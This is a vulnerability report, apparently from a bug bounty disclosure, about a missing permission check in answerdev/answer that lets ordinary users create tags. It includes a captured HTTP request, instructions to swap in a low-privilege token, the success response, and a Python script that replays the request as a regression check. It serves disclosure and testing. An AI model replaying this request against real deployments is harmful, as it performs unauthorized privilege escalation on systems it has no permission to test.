attackers with role "USER" can create tags in answerdev/answer
Valid
Reported on
Jul 1st 2023
Description
It seems that users with the role "USER" have no permission to create tags, but we do not enforce it. Other operations, like edit and delete, have no problem.
Proof of Concept
Pull the latest docker image and set up answer.
1 Create a user with name "normaluser", whose role is "USER".
2 Admin creates a tag.
3 Use Burp Suite to hijack the request, as below:
POST /answer/api/v1/tag HTTP/1.1
Host: localhost:9080
Content-Length: 65
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/tags/create
Accept-Encoding: gzip, deflate
Connection: close
Authorization: fd201c60-1819-11ee-82d0-0242ac170002
{"display_name":"tag3","slug_name":"tag3","original_text":"tag3"}
4 Replace Authorization with normaluser's Authorization, and send the request.
5 The response can be like:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 01 Jul 2023 14:25:32 GMT
Content-Length: 81
Connection: close
{"code":200,"reason":"base.success","msg":"Success.","data":{"slug_name":"tag3"}}
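The replay in steps 4 and 5 can be scripted so the check is repeatable, for example as a regression test after the fix lands. The script below is an added example for this page; it is not part of the original report or of the answerdev/answer code base. It assumes only what the captured traffic above shows: the endpoint `POST /answer/api/v1/tag`, a bare session token in the `Authorization` header, the JSON body with `display_name`/`slug_name`/`original_text`, and a success response of HTTP 200 with JSON `"code": 200`. Treating HTTP 401/403 as enforcement of the permission is an assumption; the `transport` parameter and the `http_send`/`classify`/`check_tag_create` names are this example's own.

```python
"""Replay the create-tag request from the report with an arbitrary session
token and report whether the server enforced the "create tag" permission.

Added example, not the project's code. Endpoint, headers and JSON shapes
are taken from the captured request/response; 401/403 meaning "enforced"
is an assumption.
"""
import json
import sys
import urllib.error
import urllib.request

TAG_PATH = "/answer/api/v1/tag"


def build_create_tag_request(base_url, token, slug):
    """Rebuild the captured POST with the Authorization header under test."""
    body = json.dumps(
        {"display_name": slug, "slug_name": slug, "original_text": slug}
    ).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + TAG_PATH,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/json",
            "Accept": "*/*",
            "Authorization": token,  # e.g. the session token of "normaluser"
        },
    )


def http_send(req):
    """Default transport: perform the request and return (status, body bytes).

    urllib raises on 4xx/5xx, so unwrap HTTPError to keep status and body.
    """
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(status, body):
    """Map (status, body) to a verdict.

    "not_enforced": the server created the tag for this token (200 / code 200).
    "enforced":     the server rejected the token outright (401/403, assumed).
    "inconclusive": anything else (validation error, duplicate slug, 5xx).
    """
    try:
        payload = json.loads(body)
    except ValueError:
        payload = {}
    if not isinstance(payload, dict):
        payload = {}
    if status == 200 and payload.get("code") == 200:
        return "not_enforced"
    if status in (401, 403):
        return "enforced"
    return "inconclusive"


def check_tag_create(base_url, token, slug, transport=http_send):
    """Send one create-tag request and return its status and verdict.

    `transport` is injectable so the logic can be exercised offline with a
    canned response instead of a live instance.
    """
    status, body = transport(build_create_tag_request(base_url, token, slug))
    return {"status": status, "verdict": classify(status, body)}


if __name__ == "__main__":
    # Usage: python check_tag_create.py http://localhost:9080 <normaluser token> tag3
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} BASE_URL TOKEN SLUG")
    result = check_tag_create(*sys.argv[1:4])
    print(json.dumps(result))
    # Exit non-zero when a non-admin token succeeded, so CI can fail on regression.
    sys.exit(1 if result["verdict"] == "not_enforced" else 0)
```

Run it with the token of "normaluser" against a fresh instance: a `not_enforced` verdict reproduces the report, an `enforced` verdict shows the permission check is in place. Use a slug that does not exist yet, since a duplicate-slug rejection would be reported as `inconclusive` rather than as enforcement.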
Impact
Privilege escalation
Reported by lujiefsi, who was awarded the disclosure bounty. The fix bounty was dropped. This vulnerability has been assigned a CVE.